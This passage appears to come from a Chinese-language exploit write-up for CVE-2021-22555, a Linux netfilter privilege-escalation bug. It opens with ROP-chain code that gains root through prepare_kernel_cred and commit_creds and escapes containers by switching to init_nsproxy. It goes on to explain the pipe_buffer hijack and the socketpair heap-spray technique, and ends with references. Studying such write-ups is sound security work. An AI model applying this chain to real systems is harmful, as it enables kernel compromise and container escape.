      *rop++ = kbase_addr + POP_RDI_RET;                                            // pop rdi; ret;
      *rop++ = 0; // RDI
      *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
      *rop++ = kbase_addr + POP_RCX_RET;                                            // pop rcx; ret;
      *rop++ = 4; // RCX
      *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;                              // cmp rcx, 4; jne 0x274579; pop rbp; ret; 
      *rop++ = 0xDEADBEEF; // RBP
      *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;                        // mov rdi, rax; jne 0x788d41; xor eax, eax; ret;
      *rop++ = kbase_addr + COMMIT_CREDS;
  • (7)从docker、k8s容器(kubernetes)中逃逸,参考 The Route to Root: Container Escape Using Kernel Exploitation利用 Linux 内核漏洞实现 Docker 逃逸。本环境没有用到容器,这一步不执行也能提权。如果Linux运行在容器环境中,即使提权成功,由于所在的命名空间权限受限,即使是root也会受限(如文件系统只读等)。方法1,可以将初始进程(pid=1)的task_struct->fs(存放着进程根目录及工作目录)复制到exp所在的进程,就能将exp进程的根目录设置到宿主机中了,但这种方法可能环境变量不对(需采用完整路径执行程序);方法2,task_struct->nsproxy指向当前进程的命名空间,可以用系统初始化时的全局命名空间init_nsproxy替换exp所在进程的nsproxy,执行switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)即可。
      // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
      *rop++ = kbase_addr + POP_RDI_RET;                                            // pop rdi; ret;
      *rop++ = 1; // RDI
      *rop++ = kbase_addr + FIND_TASK_BY_VPID;                                      // find_task_by_vpid
      *rop++ = kbase_addr + POP_RCX_RET;                                            // pop rcx; ret;
      *rop++ = 4; // RCX
      *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;                              // cmp rcx, 4; jne 0x274579; pop rbp; ret; 
      *rop++ = 0xDEADBEEF; // RBP
      *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;                        // mov rdi, rax; jne 0x788d41; xor eax, eax; ret;
      *rop++ = kbase_addr + POP_RSI_RET;                                            // pop rsi; ret;
      *rop++ = kbase_addr + INIT_NSPROXY; // RSI                                    // init_nsproxy
      *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;                                 // switch_task_namespaces
  • (8)恢复rbp/rsp,RSI+0x2b0处(pipe_buffer+0x2b0处)
      // Load RBP from scratchpad_addr and resume execution.
      *rop++ = kbase_addr + POP_RBP_RET;                                            // pop rbp; ret;
      *rop++ = scratchpad_addr - 0xA; // RBP
      *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_A_POP_RBP_RET;                       // push qword ptr [rbp + 0xa]; pop rbp; ret;
      *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;                                // mov rsp, rbp; pop rbp; ret;

3-5 提权成功


4. 知识补充

4-1 victim对象

pipe_buffer 对象 -> pipe_buf_operations :包含全局函数表指针ops。

struct pipe_buffer {
    struct page *page;                            // 读写pipe时, 实际上是读写page地址
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;        // <-------- 函数表
    unsigned int flags;
    unsigned long private;

struct pipe_buf_operations {
    int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);    // 确保 pipe buffer 中的数据有效,有效则返回0,无效则返回负值错误码。
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);// <-------- 释放 pipe buffer
    bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
    bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);

pipe 操作函数表pipefifo_fops

const struct file_operations pipefifo_fops = {
    .open        = fifo_open,            // <------- open
    .llseek        = no_llseek,
    .read_iter    = pipe_read,            // <------- read
    .write_iter    = pipe_write,            // <------- write
    .poll        = pipe_poll,
    .unlocked_ioctl    = pipe_ioctl,
    .release    = pipe_release,            // <------- release
    .fasync        = pipe_fasync,
    .splice_write    = iter_file_splice_write,

pipe_buffer分配alloc_pipe_info() —— 分配大小为0x370(默认16个page,16*0x28=0x370),所以位于0x400堆块中。

分配调用链:(1)pipe() -> do_pipe2() -> __do_pipe_flags() -> create_pipe_files() -> get_pipe_inode() -> alloc_pipe_info() (2)fifo_open() -> alloc_pipe_info()

struct pipe_inode_info *alloc_pipe_info(void)
    struct pipe_inode_info *pipe;
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;            // pipe_bufs = 16
    struct user_struct *user = get_current_user();
    unsigned long user_bufs;
    unsigned int max_size = READ_ONCE(pipe_max_size);

    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);    // 分配 pipe_inode_info 结构
    ... ...
    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),            // 分配大小 16*sizeof(pipe_buffer) = 16*0x28 = 370, 注意也是 GFP_KERNEL_ACCOUNT 标志
    ... ...
    return NULL;

pipe_buffer释放pipe_release() -> put_pipe_info() -> free_pipe_info -> pipe_buf_release() 调用pipe_buffer->ops->release 函数,可劫持控制流。

static inline void pipe_buf_release(struct pipe_inode_info *pipe,
                    struct pipe_buffer *buf)
    const struct pipe_buf_operations *ops = buf->ops;

    buf->ops = NULL;
    ops->release(pipe, buf);                    // 劫持控制流

4-2 spray对象

SKB喷射:采用socketpair()创建一对无名的、相互连接的套接字,int socketpair(int domain, int type, int protocol, int sv[2]),函数成功则返回0, 创建好的套接字分别是sv[0]和sv[1],失败则返回-1。可以往sv[0]中写,从sv[1]中读;或者从sv[1]中写,从sv[0]中读,相关函数为write()read()。也可以调用sendmsg()recvmsg()来发送和接收数据,用户参数是msghdr结构。本exp是采用write()read()进行堆喷和释放的。


为了使xt_table_info漏洞对象、spray对象、victim对象、占位对象位于同一cache,由于漏洞对象是用GFP_KERNEL_ACCOUNT标志分配的,所以其他对象也应该用GFP_KERNEL_ACCOUNT标志来分配(原作者指出,在linux 5.9之前,不同的slab被用于计数)。victim对象——pipe_buffer结构和占位对象——msg_msg结构(参见文章[7]中的分析)都是用GFP_KERNEL_ACCOUNT标志来分配的。

4-4 64位系统下编译32位程序

# gcc -m32 选项 
$ sudo apt-get update
$ sudo apt-get purge libc6-dev
$ sudo apt-get install libc6-dev
$ sudo apt-get install libc6-dev-i386


[1] —— 漏洞公告

[2] CVE-2021-22555: Turning \x00\x00 into 10000$ —— writeup英文

[3] CVE-2021-22555-exploit —— exp

[4] CVE-2021-22555: 从 x00x00 到10000$奖金 —— writeup中文

[5] 隐藏十五年的漏洞:CVE-2021-22555 漏洞分析与复现 —— writeup中文

[6] CVE-2021-22555 linux内核提权 —— writeup中文

[7] Linux内核中利用msg_msg结构实现任意地址读写 —— msg_msg结构的创建与读取,占位对象

[8] socketpair的用法和理解 —— socketpair() 函数,用于堆喷

[9] Linux进程间通信(七):消息队列 msgget()、msgsend()、msgrcv()、msgctl() —— 创建msg_msg结构,用于堆喷

[10] Linux系统调用:pipe()系统调用源码分析 —— pipe堆喷

[11] 一、Netfilter简介 —— Netfiler 背景知识

[12] linux内核协议栈 netfilter 之 ip 层的table、rule、match、target结构分析 —— Netfiler 背景知识

[13] The Route to Root: Container Escape Using Kernel Exploitation —— 容器逃逸方法 英文

[14] 利用 Linux 内核漏洞实现 Docker 逃逸 —— 容器逃逸方法 中文



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